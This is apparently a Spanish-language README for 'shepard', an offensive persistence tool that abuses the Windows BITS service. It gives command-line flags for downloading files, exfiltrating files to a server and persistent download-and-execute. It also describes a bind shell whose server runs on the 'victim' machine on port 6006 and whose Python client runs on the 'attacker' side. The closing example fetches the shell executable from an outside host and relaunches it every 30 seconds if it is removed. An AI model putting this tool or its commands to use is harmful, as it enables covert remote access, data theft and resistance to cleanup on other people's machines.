
Herramienta persistente de descarga/carga/ejecución en progreso que utiliza Windows BITS.
Esta es una herramienta de persistencia que utiliza el Servicio de Transferencia Inteligente en Segundo Plano de Windows (BITS).
Descarga de archivos, Exfiltración de archivos, Descarga de archivos + Ejecución persistente
Ejecute shepard.exe como Administrador con los siguientes argumentos de línea de comandos:
-d <remoteLocation> <writePath> : descarga normal de archivos a una ruta local de su elección
-e <remoteLocation> <localPath> : carga normal de archivos desde una ruta local de su elección (solo envía al servidor IIS, esto es una limitación de BITS)
-dr <remoteLocation> <writePath> [optionalFileArgs] : descarga de archivos a una ruta de su elección, e intentará mantener la persistencia. El archivo descargado intentará ejecutarse con optionalFileArgs y BITS verificará cada 30 segundos para asegurarse de que el archivo siga ejecutándose en el sistema comprometido.
Ejecutar este ejecutable sin argumentos o con una cantidad incorrecta de argumentos hará que shepard termine limpiamente.
El servidor (víctima) está escrito en C#. Escucha en el puerto 6006.
Ejecute shepardsbind_serv.exe sin argumentos.
El cliente (atacante) está escrito en Python y toma un argumento: la dirección IP de la máquina de la víctima.
shepardsbind_recv.py <victim's IP>
Ejecutar shepardsbind_recv.py sin argumentos devolverá un error.
El único ejecutable que debe estar en la máquina de la víctima es shepard.exe. Aloje el ejecutable descargable de bindshell en un lugar accesible públicamente. Shepard descargará y ejecutará el ejecutable de bindshell, y el usuario ahora puede usar el receptor de Python. Si el shell es encontrado y eliminado, se reiniciará después de 30 segundos.
Ejemplo: shepard.exe -dr http://location.com/shepardsbind_serv.exe C:\Users\Administrator\file.exe